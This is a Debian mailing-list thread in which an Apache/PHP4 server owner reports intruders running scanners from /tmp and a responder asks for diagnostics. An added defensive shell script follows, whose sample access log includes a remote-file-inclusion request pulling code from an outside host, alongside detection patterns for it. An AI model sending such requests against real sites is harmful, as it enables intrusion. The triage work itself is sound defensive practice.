Hello Petter,

The actual list for security issues is debian-security. The address of this list is in the CC. We can now leave debian-user and switch our discussion to debian-security.

This is quite a hole! I can't believe there's such a big spot in Apache / Sarge and we haven't heard of it. Can you please share more details with us?

Give us your current package versions of apache (using dpkg -s, for example). If you suspect the installation could be compromised, run a test on the checksums. Your access logs could contain precious information. Have a look at them and post to the list any significant parts (removing any IP/host address you don't want to get published).

We still don't know what you use your Apache for. Most of the problems come from poor PHP scripts. What scripts/services are you running on this server? Can you post a sample of your netstat, your list of processes for user www-data, and a sample of the files you find in your /tmp?

Regards,
Josep SERRANO

> Hi
>
> I'm not completely new to Debian or Linux, but I wouldn't classify
> myself as a battle-scarred sysadmin just yet :)
>
> Anyways. My problem is security-related, and I hope that I'm posting to
> the correct list as well as hoping that someone can help me out here.
>
> Recently I've noticed that my Apache installation gets violated and that
> an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
> makes Apache execute these. Unfortunately these are some rather nasty
> things, mostly portscanners and brute-force attacks. They are all easily
> detected with netstat, and at least once a day I have to go in and kill
> the processes spawned by www-data (the user that runs Apache) as well as
> delete the offending files.
>
> Now, like I said - I'm not a pro, I'm trying to learn by doing.
> Unfortunately how this happens is way over my experience, and now I
> could really use some help in fixing this leak. I've narrowed it down to
> Apache only, but I have no clue as to how to seal the leak. I'm running
> a small server in my home using (mostly) Debian Sarge. This is a real
> Frankenstein-machine as it was originally a Woody box, but it's been
> upgraded with bits from all over. It's been running pretty much
> constantly for three years. Of course I apply security fixes when they
> arrive, but I don't know if the source of these intrusions is Apache or
> just that I have managed to fubar some setting somewhere, allowing an
> attacker to make Apache execute code.
>
> Essentially the machine is Debian Sarge, with MySQL and PHP4. There are
> other services running on it, but I've noticed that the
> intrusions/code-executions only happen through Apache. MySQL only
> listens on localhost and accepts no connections from the outside. Hence,
> I hope that this is limited to Apache. Apache is 1.3.x, MySQL 4.0.24 and
> PHP 4.3.
>
> I deeply appreciate any help that can make me seal this leak! Thank you
> all in advance!
>
> /petter senften

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
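As an added example (not code from either poster), here are small shell filters for the checks Josep asks for: www-data processes, executable files in /tmp and /var/tmp, and access-log lines worth reading first. The tool invocations in the comments and the sample data are constructed by me, and the URL-as-parameter log heuristic is a general assumption rather than something stated in the thread.

```shell
#!/bin/sh
# Added example (not from the thread): filters for the "www-data runs things
# from /tmp" pattern Josep asks about. Each reads one standard tool's output on
# stdin, so it works live on the box or on output saved from it.
#
# Live usage as root:
#   ps -o pid=,user=,args= -u www-data                  | suspicious_procs
#   find /tmp /var/tmp -type f -printf '%p\t%m\t%u\n'   | suspicious_tmp_files
#   flag_requests < /var/log/apache/access.log

# Processes whose command line points into /tmp or /var/tmp.
# Input: "PID USER ARGS..." lines (ps format above); output: "PID ARGS".
suspicious_procs() {
    awk '{ cmd = $0; sub(/^[ \t]*[0-9]+[ \t]+[^ \t]+[ \t]+/, "", cmd)
           if (cmd ~ /(^|[ \t])\/(var\/)?tmp\//) print $1, cmd }'
}

# Files owned by www-data with an execute bit set (an odd octal digit among
# the last three mode digits). Input: "PATH<TAB>MODE<TAB>OWNER"; output: PATH.
suspicious_tmp_files() {
    awk -F '\t' '$3 == "www-data" && substr($2, length($2) - 2) ~ /[1357]/ { print $1 }'
}

# Access-log lines to read first: requests naming /tmp or /var/tmp, or passing
# a full URL (plain or percent-encoded) as a parameter value. The second
# heuristic is a generic sign of a PHP script being fed an external file.
flag_requests() {
    grep -E '"[A-Z]+ [^"]*(/(var/)?tmp/|=(https?|ftp)(://|%3[Aa]%2[Ff]%2[Ff]))'
}

# Constructed sample tool output (not real data) so the filters run offline.
SAMPLE_PS='1234 www-data /tmp/.x/scanner
1235 www-data /usr/sbin/apache
1236 www-data perl /var/tmp/bot.pl'
SAMPLE_FIND=$(printf '/tmp/.x/scanner\t755\twww-data\n/tmp/sess_abc123\t600\twww-data\n/var/tmp/bot.pl\t644\twww-data\n/tmp/notes.txt\t755\tpetter\n')
SAMPLE_LOG='203.0.113.5 - - [01/Jan/2005:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2005:10:00:01 +0000] "GET /index.php?page=http://203.0.113.9/x.txt HTTP/1.1" 200 12
203.0.113.9 - - [01/Jan/2005:10:00:02 +0000] "GET /view.php?file=/tmp/.x/scanner HTTP/1.1" 200 12'

# Runs every filter over the samples and prints the findings (5 lines here).
triage_sample() {
    printf '%s\n' "$SAMPLE_PS"   | suspicious_procs
    printf '%s\n' "$SAMPLE_FIND" | suspicious_tmp_files
    printf '%s\n' "$SAMPLE_LOG"  | flag_requests
}
```

Anything these filters flag still needs to be read by hand; they narrow the haystack, they do not prove a compromise.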